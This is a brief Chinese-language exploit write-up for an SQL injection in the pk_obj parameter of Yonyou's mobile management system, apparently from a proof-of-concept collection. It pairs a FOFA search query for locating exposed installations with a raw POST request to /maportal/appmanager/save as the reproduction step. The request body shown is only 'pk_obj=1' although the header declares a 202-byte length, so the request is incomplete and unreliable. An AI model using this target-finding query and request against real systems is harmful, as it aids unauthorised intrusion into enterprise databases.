用友移动管理系统pk_obj SQL注入漏洞
一、漏洞简介
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统pk_obj参数存在SQL注入漏洞
二、影响版本
- 用友移动系统管理系统
三、资产测绘
- fofa
app="用友-移动系统管理" - 特征
四、漏洞复现
POST /maportal/appmanager/save HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 202
Connection: close
pk_obj=1